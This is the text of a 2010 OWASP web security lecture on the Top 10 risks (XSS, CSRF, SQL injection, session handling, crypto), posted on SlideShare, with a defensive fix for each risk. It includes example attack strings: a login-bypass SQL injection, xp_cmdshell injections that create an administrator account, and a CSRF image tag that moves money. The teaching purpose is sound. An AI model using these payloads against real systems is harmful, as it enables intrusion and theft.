SlideShare a Scribd company logo

WebApps_Lecture_15.ppt

Download as PPT, PDF
O
OmprakashVerma56

This document provides an overview of common web application vulnerabilities as outlined by the Open Web Application Security Project (OWASP). It discusses topics like cross-site scripting (XSS), SQL injection, cross-site request forgery (CSRF), and insecure direct object references. Code examples and potential exploits are presented to demonstrate how these vulnerabilities can occur and be prevented through practices like input validation, prepared statements, and output encoding. The document aims to educate about the OWASP Top 10 list of risks and how to develop more securely.

1 of 45
Download to read offline
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org WebAppSec 101: OWASP Top 10 and WebGoat Kyle OWASP UCI Chapter Lead 5/17/2010
OWASP Quick OWASP Background Open Web Application Security Project OC chapter lead by Neil Matatall, original creator of this presentation Upcoming conference on Tue, Sept 7th AppSec US 2010 @ UCI
OWASP OWASP’s Top 10 List 1. Injection Flaws a) SQL Injection, XPATH Injection, etc 2. Cross-Site Scripting (XSS) 3. Broken Authentication and Session Management 4. Insecure Direct Object Reference 5. Cross Site Request Forgery (CSRF) 6. Security Misconfiguration 7. Insecure Cryptographic Storage 8. Failure to Restrict URL Access 9. Insufficient Transport Layer Protection 10. Unvalidated Redirects and Forwards From OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
OWASP What We’re Covering 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
OWASP Cross-Site Scripting (XSS) Attacks Malicious code that can change the look and function of a legitimate web application Originates from old phishing attacks but less obvious and more dangerous to the user/victim More widespread now because of move to more rich Internet applications using dynamic content and JavaScript and the latest AJAX trend My favorite XSS resource OWASP Cross-site Scripting (XSS)
OWASP Websites XSS’d A hacker was able to insert JavaScript code into the Obama community blog section The JavaScript would redirect the users to the Hillary Clinton website YouTube Demonstration Read about it on ChannelWeb Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had XSS bugs.
OWASP Cross-Site Scripting (XSS) Attacks
OWASP The Impact of XSS Data residing on the web page can be sent anywhere in the world Including cookies! Facilitates many other types of attacks Cross-Site Request Forgery (CSRF), Session Attacks (more later) Your site’s behavior can be hijacked
OWASP Our first demo… Stored XSS Attack
OWASP Preventing XSS Escape all user input when it is displayed Escaping converts the output to harmless html entities  <script> becomes &lt;script&gt;  but still displayed as <script> Methods:  OWASP ESAPI  Java Standard Tag Library (JSTL) <c:out/> OWASP XSS Prevention Cheat Sheet
OWASP Preventing XSS - Continued Ensure your filter uses a white list approach Filters based on blacklisting have historically been flawed  E.g. PHP, Ruby on Rails sanitize method New encoding schemes can easily bypass filters that use a blacklist approach Do not accept and reflect unsolicited input Reflecting every parameter for confirmation pages Printing out the session/request parameters in error pages Great XSS Test Fixture: http://ha.ckers.org/xss.html
OWASP This Presentation's Re-ordered List 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
OWASP Cross Site Request Forgery (CSRF) From http://www.owasp.org/index.php/Top_10_2010-Main: “A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.
OWASP Cross Site Request Forgery (CSRF)  Occurs when an authenticated user unknowingly initiates a request  The request is handled as if it were intentional  Usually happens without the user being aware!  CSRF attacks are difficult to track  Commands are executed in the context of the victim  The request comes from the users IP address so it is difficult to hunt down the hacker  The hacker is essentially given all of the user’s privileges  XSS facilitates CSRF via “Link Injection”
OWASP CSRF Example  A hacker posts to a message board containing an image tag  <img src= “http://yourbank.com/transfer? to_account=my_account_number&amount=all_of_your_money>  An unsuspecting user logs into yourbank.com and authenticates  The user then visits said message board  A request is issued from the victim’s browser to the bank’s website  The bank’s website transfers the user’s money to the hacker’s account
OWASP CSRF In the Real World Netflix vulnerabilities allowed attackers to change the shipping addresses, email address, password, and movie queues Novell GroupWise WebAccess was found to contain a CSRF (and XSS) vulnerability that allowed an attacker to receive copies of any compromised email account Sun’s IdM allowed hackers to change the passwords of admin accounts
OWASP Solution Add a secondary authentication mechanism  Such as an impossible to guess token Require a confirmation page before executing potentially dangerous actions Eliminate XSS vulnerabilities Use POST as your form action and only accept POST requests on the server for sensitive data !  Incoming CSRF requests will fail since the parameter is in the URL and not the post body You can protect yourself with RequestPolicy (Firefox extension)
OWASP This Presentation's Re-ordered List 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
OWASP Insecure Direct Object Reference  “A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.”  Fancy term for parameter tampering  Involves modifying parameters to access unauthorized materials  E.g. /BankAccount.jsp?acct_nmbr=123  The hacker modifies the parameter to view another users account
OWASP Demo Bypass Data Layer Access Control
OWASP Solution  Properly validate data!  Cookie data, URL parameters, all HTML Form data (even hidden, select, radio and checkbox types)  Restricting length of HTML text boxes, options in select boxes, and JavaScript validation can all be easily sidestepped and are not secure  All input data MUST be validated server side for each request – client side validation is EASILY bypassed  Do not expose internals to the user  Such as IDs (if possible/necessary)  Use an indirect reference map with hard to guess keys (hash)  POST /BankAccount.jsp?acct_nmbr=d83OJdm3  The server then uses the key to get the real value  Key: d83OJdm3 value: 123
OWASP Use Proper Authorization  Architect your application to check authorization with every request  Back to the bank example  Before: select * from accounts where account_number = ?  After: select * from accounts where account_number = ? and user_id =?
OWASP This Presentation's Re-ordered Top 10 List 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
OWASP UCLA Security Incident 30,000 people affected directly; 800,000 notifications sent out 12/2006 Unsupported/forgotten legacy web application was targeted with escalated database privileges Web application vulnerability exposed data online using SQL injection Hacked server was then used to gain access to more sensitive servers
OWASP SQL Injection Attacks “SQL injection is a security vulnerability that occurs in the database layer of an application. Its source is the incorrect escaping of dynamically-generated string literals embedded in SQL statements. “ (Wikipedia)
OWASP Impact of SQL Injection - Dangerous At best: you can leak information Depending on your configuration, a hacker can Delete, alter or create data Grant direct access to the hacker Escalate privileges and even take over the OS
OWASP SQL Injection Attacks Login Example Attack Text in blue is your SQL code, Text in orange is the hacker input, black text is your application code Login: Password: Dynamically Build SQL String performing authentication: “SELECT * FROM users WHERE login = ‘” + userName + “’ and password= ‘” + password + “’”; Hacker logs in as: ‘ or ‘’ = ‘’; -- SELECT * FROM users WHERE login = ‘’ or ‘’ = ‘’; --‘ and password=‘’
OWASP More Dangerous SQL Injection Attacks Hacker creates a Windows Account: SELECT * FROM users WHERE login = ‘’; exec master..xp_cmdshell 'net users username password /add';--’ and password= ’’ And then adds himself as an administrator: SELECT * FROM users WHERE login = ‘'; exec master..xp_cmdshell 'net localgroup Administrators username /add';--’ and password= ‘’ SQL Injection examples are outlined in:  http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf  http://www.unixwiz.net/techtips/sql-injection.html
OWASP Exploits of a Mom http://xkcd.com/327/
OWASP SQL Injection Demo… String SQL Injection
OWASP Preventing SQL injection Use Prepared Statements (aka Parameterized Queries) $id=1234 “select * from accounts where id = “ + $id vs “select * from accounts where id =1234” Validate input Strong typing  If the id parameter is a number, try parsing it into an integer Business logic validation Escape questionable characters (ticks, --, semi-colon, brackets, etc.)
OWASP Mimimize the Impact of SQL injection Quiz: Is running a Web Application as the Database System Admin “sa” account a good practice? Use the principle of least privilege If the query is reading the database, do not run the query as a user with update permissions (dbo, drop, etc)
OWASP Injection Impacts More Than SQL “Injection Flaw” is a blanket term SQL Injection is most prevalent Other forms: XPath Injection Command Injection LDAP (Lightweight Directory Access Protocol) Injection DOM (Document Object Model) Injection JSON (Javascript Object Notation) Injection Log Spoofing On and on and on…
OWASP This Presentation's Re-ordered Top 10 List 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
OWASP Authentication Checks  From http://www.owasp.org/index.php/Top_10_2010-Main “Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.”  Never store passwords in plaintext  Encrypt or Hash+Salt (preferred)  Architect applications to check every request to see that the authentication data is still valid  Issue a new session token when a change in privilege occurs  ASP reuses session IDs by default!  If you absolutely must use “remember me” functionality, use a difficult to guess authentication cookie  Authentication data is sent with every request, so protect it
OWASP Session Attacks Session Fixation: The hacker predicts a valid session key (usually via phishing) Session Hijacking: The hacker masquerades as another user by stealing the users session id (usually via XSS)
OWASP Demos Spoofing an Authentication Cookie
OWASP Hardening Authentication  Every request to each page of a web application should be revalidated for proper authenticated and authorized access  Check validity of authentication cookie on each request. Validate original IP address is the same as current request IP and age since created or last checked. Deny access if not.  Check that the authenticated user is authorized to access your application (using internal database of users, LDAP, authorization service, etc) on each request
OWASP Solution Use built in session management! Most application servers do a pretty good job of this (except ASP, boo Microsoft) Use secure randomly generated session keys to make prediction impossible Don’t expose the user to session ids if possible Use reasonable session timeouts
OWASP This Presentation's Re-ordered Top 10 List 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
OWASP Failure to Restrict URL Access  “Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly. “  Can be caused by:  Improper authentication  Incorrect authorization  Unprotected admin areas  Usually caused by easy to guess URLs  .htaccess is your friend!
OWASP This Presentation's Re-ordered Top 10 List 1. Cross-Site Scripting (XSS) 2. Cross-Site Request Forgery (CSRF) 3. Insecure Direct Object Reference 4. Injection Flaws a) SQL Injection, XPATH Injection, etc 5. Broken Authentication and Session Management 6. Failure to Restrict URL Access 7. Insecure Cryptographic Storage
OWASP Insecure Cryptographic Storage  From http://www.owasp.org/index.php/Top_10_2007 : “Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.”  Use latest standard encryption methods  They are standards for a reason! And they change over time  Use strong standard encryption methods  Stop using Message-Digest Algorithm 5 (MD5), Secure Hash Algorithm (SHA1), Data Encryption Standard (DES)  Use SHA-256, Advanced Encryption Standard (AES), Rivest/Shamir/Adleman Public Key Encryption (RSA)  Encrypt stored passwords with above methods
OWASP “MD5 Considered Harmful Today” MD5 has been known to have serious weaknesses which produce collisions It has been considered a weak hash function since at least 2004 Using knowledge of MD5 collisions, researchers were able to impersonate a root CA common to all browsers This rogue CA can issue SSL certificates that even the knowledgeable end user may not notice http://www.win.tue.nl/hashclash/rogue-ca/
OWASP Thanks for coming!
Ad

Recommended

Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
Rob Ragan
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
SharePointRadi
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
Sean Jackson
 
Owasp top 10_-_2010 presentation
Owasp top 10_-_2010 presentationOwasp top 10_-_2010 presentation
Owasp top 10_-_2010 presentation
Islam Azeddine Mennouchi
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
Marco Morana
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Ivan Ortega
 
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request ForgeryOWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery
OWASP Khartoum
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry
 
Xss frame work
Xss frame workXss frame work
Xss frame work
Ngọc Liệu Nguyễn
 
webapplicationattacks-101005070110-phpapp02.pptx
webapplicationattacks-101005070110-phpapp02.pptxwebapplicationattacks-101005070110-phpapp02.pptx
webapplicationattacks-101005070110-phpapp02.pptx
SyedAliShahid3
 
4.Xss
4.Xss4.Xss
4.Xss
phanleson
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
Eoin Keary
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
skyhawk133
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
Jim Manico
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
mirahman
 
OWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryOWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgery
Nikola Milosevic
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Nitroxis Sprl
 
Web security 2010
Web security 2010Web security 2010
Web security 2010
Alok Babu
 
OWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.pptOWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.ppt
jangomanso
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
karthik menon
 
ieee
ieeeieee
ieee
Radheshyam Dhakad
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
tmd800
 
Real web-attack-scenario
Real web-attack-scenarioReal web-attack-scenario
Real web-attack-scenario
OWASP (Open Web Application Security Project)
 
Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013
Vishrut Sharma
 
Session7-XSS & CSRF
Session7-XSS & CSRFSession7-XSS & CSRF
Session7-XSS & CSRF
zakieh alizadeh
 
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Braindev Kyiv
 
SAFETY BRIEFING.........................
SAFETY BRIEFING.........................SAFETY BRIEFING.........................
SAFETY BRIEFING.........................
BalaChandran458212
 
SHIPPING CONTAINdccdcdERS BC (2).pdf.pptx
SHIPPING CONTAINdccdcdERS BC (2).pdf.pptxSHIPPING CONTAINdccdcdERS BC (2).pdf.pptx
SHIPPING CONTAINdccdcdERS BC (2).pdf.pptx
ArshjotSingh30
 
Ad

More Related Content

Similar to WebApps_Lecture_15.ppt (20)

2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry
 
Xss frame work
Xss frame workXss frame work
Xss frame work
Ngọc Liệu Nguyễn
 
webapplicationattacks-101005070110-phpapp02.pptx
webapplicationattacks-101005070110-phpapp02.pptxwebapplicationattacks-101005070110-phpapp02.pptx
webapplicationattacks-101005070110-phpapp02.pptx
SyedAliShahid3
 
4.Xss
4.Xss4.Xss
4.Xss
phanleson
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
Eoin Keary
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
skyhawk133
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
Jim Manico
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
mirahman
 
OWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryOWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgery
Nikola Milosevic
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Nitroxis Sprl
 
Web security 2010
Web security 2010Web security 2010
Web security 2010
Alok Babu
 
OWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.pptOWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.ppt
jangomanso
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
karthik menon
 
ieee
ieeeieee
ieee
Radheshyam Dhakad
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
tmd800
 
Real web-attack-scenario
Real web-attack-scenarioReal web-attack-scenario
Real web-attack-scenario
OWASP (Open Web Application Security Project)
 
Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013
Vishrut Sharma
 
Session7-XSS & CSRF
Session7-XSS & CSRFSession7-XSS & CSRF
Session7-XSS & CSRF
zakieh alizadeh
 
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Braindev Kyiv
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry
 
Xss frame work
Xss frame workXss frame work
Xss frame work
Ngọc Liệu Nguyễn
 
webapplicationattacks-101005070110-phpapp02.pptx
webapplicationattacks-101005070110-phpapp02.pptxwebapplicationattacks-101005070110-phpapp02.pptx
webapplicationattacks-101005070110-phpapp02.pptx
SyedAliShahid3
 
4.Xss
4.Xss4.Xss
4.Xss
phanleson
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
Eoin Keary
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
skyhawk133
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
Jim Manico
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
mirahman
 
OWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryOWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgery
Nikola Milosevic
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Nitroxis Sprl
 
Web security 2010
Web security 2010Web security 2010
Web security 2010
Alok Babu
 
OWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.pptOWASP_Top_10_Introduction_and_Remedies_2017.ppt
OWASP_Top_10_Introduction_and_Remedies_2017.ppt
jangomanso
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
karthik menon
 
ieee
ieeeieee
ieee
Radheshyam Dhakad
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
tmd800
 
Real web-attack-scenario
Real web-attack-scenarioReal web-attack-scenario
Real web-attack-scenario
OWASP (Open Web Application Security Project)
 
Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities 2013
Vishrut Sharma
 
Session7-XSS & CSRF
Session7-XSS & CSRFSession7-XSS & CSRF
Session7-XSS & CSRF
zakieh alizadeh
 
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Braindev Kyiv
 

Recently uploaded (20)

SAFETY BRIEFING.........................
SAFETY BRIEFING.........................SAFETY BRIEFING.........................
SAFETY BRIEFING.........................
BalaChandran458212
 
SHIPPING CONTAINdccdcdERS BC (2).pdf.pptx
SHIPPING CONTAINdccdcdERS BC (2).pdf.pptxSHIPPING CONTAINdccdcdERS BC (2).pdf.pptx
SHIPPING CONTAINdccdcdERS BC (2).pdf.pptx
ArshjotSingh30
 
Lecture 4.pptx which is need for microeconomic
Lecture 4.pptx which is need for microeconomicLecture 4.pptx which is need for microeconomic
Lecture 4.pptx which is need for microeconomic
mdrakibhasan1427
 
English For Carrier, It enhance your Communication Skills
English For Carrier, It enhance your Communication SkillsEnglish For Carrier, It enhance your Communication Skills
English For Carrier, It enhance your Communication Skills
ankitbeherabiru
 
RCM-billing in medical coding0000 1.pptx
RCM-billing in medical coding0000 1.pptxRCM-billing in medical coding0000 1.pptx
RCM-billing in medical coding0000 1.pptx
liajohn0808
 
material-17438335 to the third floor in 47-gsms.pptx
material-17438335 to the third floor in 47-gsms.pptxmaterial-17438335 to the third floor in 47-gsms.pptx
material-17438335 to the third floor in 47-gsms.pptx
JyotirmayNirankari
 
HCollege ppt guidance and counselin.pptx
HCollege ppt guidance and counselin.pptxHCollege ppt guidance and counselin.pptx
HCollege ppt guidance and counselin.pptx
liajohn0808
 
Latest Questions & Answers | Prepare for H3C GB0-961 Certification
Latest Questions & Answers | Prepare for H3C GB0-961 CertificationLatest Questions & Answers | Prepare for H3C GB0-961 Certification
Latest Questions & Answers | Prepare for H3C GB0-961 Certification
NWEXAM
 
LCL216_2024-2_WEEKS 4 & 5_IF CLAUSES (1).pdf
LCL216_2024-2_WEEKS 4 & 5_IF CLAUSES (1).pdfLCL216_2024-2_WEEKS 4 & 5_IF CLAUSES (1).pdf
LCL216_2024-2_WEEKS 4 & 5_IF CLAUSES (1).pdf
rafaelsago2015
 
Career Planning After Class XII: Your Roadmap to Success
Career Planning After Class XII: Your Roadmap to SuccessCareer Planning After Class XII: Your Roadmap to Success
Career Planning After Class XII: Your Roadmap to Success
Dr. Radhika Sharma
 
Top Business Schools in Delhi For Quality Education
Top Business Schools in Delhi For Quality EducationTop Business Schools in Delhi For Quality Education
Top Business Schools in Delhi For Quality Education
top10privatecolleges
 
Best Fashion Designing Colleges in Delhi
Best Fashion Designing Colleges in DelhiBest Fashion Designing Colleges in Delhi
Best Fashion Designing Colleges in Delhi
top10privatecolleges
 
Huckel_Molecular orbital _Theory_8_Slides.pptx
Huckel_Molecular orbital _Theory_8_Slides.pptxHuckel_Molecular orbital _Theory_8_Slides.pptx
Huckel_Molecular orbital _Theory_8_Slides.pptx
study2022bsc
 
Introduction on Speaking skills Power Point
Introduction on Speaking skills Power PointIntroduction on Speaking skills Power Point
Introduction on Speaking skills Power Point
helenswarna
 
Software Development Business Plan1.pptx
Software Development Business Plan1.pptxSoftware Development Business Plan1.pptx
Software Development Business Plan1.pptx
vkprintingsolution
 
sorcesofdrugs-160228074 56 4246643544 (3).ppt
sorcesofdrugs-160228074 56 4246643544 (3).pptsorcesofdrugs-160228074 56 4246643544 (3).ppt
sorcesofdrugs-160228074 56 4246643544 (3).ppt
IndalSatnami
 
Pixida, Simplifying Success in Germany, the USA, Brazil, China and Portugal
Pixida, Simplifying Success in Germany, the USA, Brazil, China and PortugalPixida, Simplifying Success in Germany, the USA, Brazil, China and Portugal
Pixida, Simplifying Success in Germany, the USA, Brazil, China and Portugal
TechMeetups
 
Stakeholders Management GT 11052021.cleaned.pptx
Stakeholders Management GT 11052021.cleaned.pptxStakeholders Management GT 11052021.cleaned.pptx
Stakeholders Management GT 11052021.cleaned.pptx
SaranshJeena
 
Employment Communication : The Job HUnting.pptx
Employment Communication : The Job HUnting.pptxEmployment Communication : The Job HUnting.pptx
Employment Communication : The Job HUnting.pptx
JunaidAlvi5
 
RightShip-Inspection-Maritime-Safety-Simplified.pptx
RightShip-Inspection-Maritime-Safety-Simplified.pptxRightShip-Inspection-Maritime-Safety-Simplified.pptx
RightShip-Inspection-Maritime-Safety-Simplified.pptx
ultronmeg
 
SAFETY BRIEFING.........................
SAFETY BRIEFING.........................SAFETY BRIEFING.........................
SAFETY BRIEFING.........................
BalaChandran458212
 
SHIPPING CONTAINdccdcdERS BC (2).pdf.pptx
SHIPPING CONTAINdccdcdERS BC (2).pdf.pptxSHIPPING CONTAINdccdcdERS BC (2).pdf.pptx
SHIPPING CONTAINdccdcdERS BC (2).pdf.pptx
ArshjotSingh30
 
Lecture 4.pptx which is need for microeconomic
Lecture 4.pptx which is need for microeconomicLecture 4.pptx which is need for microeconomic
Lecture 4.pptx which is need for microeconomic
mdrakibhasan1427
 
English For Carrier, It enhance your Communication Skills
English For Carrier, It enhance your Communication SkillsEnglish For Carrier, It enhance your Communication Skills
English For Carrier, It enhance your Communication Skills
ankitbeherabiru
 
RCM-billing in medical coding0000 1.pptx
RCM-billing in medical coding0000 1.pptxRCM-billing in medical coding0000 1.pptx
RCM-billing in medical coding0000 1.pptx
liajohn0808
 
material-17438335 to the third floor in 47-gsms.pptx
material-17438335 to the third floor in 47-gsms.pptxmaterial-17438335 to the third floor in 47-gsms.pptx
material-17438335 to the third floor in 47-gsms.pptx
JyotirmayNirankari
 
HCollege ppt guidance and counselin.pptx
HCollege ppt guidance and counselin.pptxHCollege ppt guidance and counselin.pptx
HCollege ppt guidance and counselin.pptx
liajohn0808
 
Latest Questions & Answers | Prepare for H3C GB0-961 Certification
Latest Questions & Answers | Prepare for H3C GB0-961 CertificationLatest Questions & Answers | Prepare for H3C GB0-961 Certification
Latest Questions & Answers | Prepare for H3C GB0-961 Certification
NWEXAM
 
LCL216_2024-2_WEEKS 4 & 5_IF CLAUSES (1).pdf
LCL216_2024-2_WEEKS 4 & 5_IF CLAUSES (1).pdfLCL216_2024-2_WEEKS 4 & 5_IF CLAUSES (1).pdf
LCL216_2024-2_WEEKS 4 & 5_IF CLAUSES (1).pdf
rafaelsago2015
 
Career Planning After Class XII: Your Roadmap to Success
Career Planning After Class XII: Your Roadmap to SuccessCareer Planning After Class XII: Your Roadmap to Success
Career Planning After Class XII: Your Roadmap to Success
Dr. Radhika Sharma
 
Top Business Schools in Delhi For Quality Education
Top Business Schools in Delhi For Quality EducationTop Business Schools in Delhi For Quality Education
Top Business Schools in Delhi For Quality Education
top10privatecolleges
 
Best Fashion Designing Colleges in Delhi
Best Fashion Designing Colleges in DelhiBest Fashion Designing Colleges in Delhi
Best Fashion Designing Colleges in Delhi
top10privatecolleges
 
Huckel_Molecular orbital _Theory_8_Slides.pptx
Huckel_Molecular orbital _Theory_8_Slides.pptxHuckel_Molecular orbital _Theory_8_Slides.pptx
Huckel_Molecular orbital _Theory_8_Slides.pptx
study2022bsc
 
Introduction on Speaking skills Power Point
Introduction on Speaking skills Power PointIntroduction on Speaking skills Power Point
Introduction on Speaking skills Power Point
helenswarna
 
Software Development Business Plan1.pptx
Software Development Business Plan1.pptxSoftware Development Business Plan1.pptx
Software Development Business Plan1.pptx
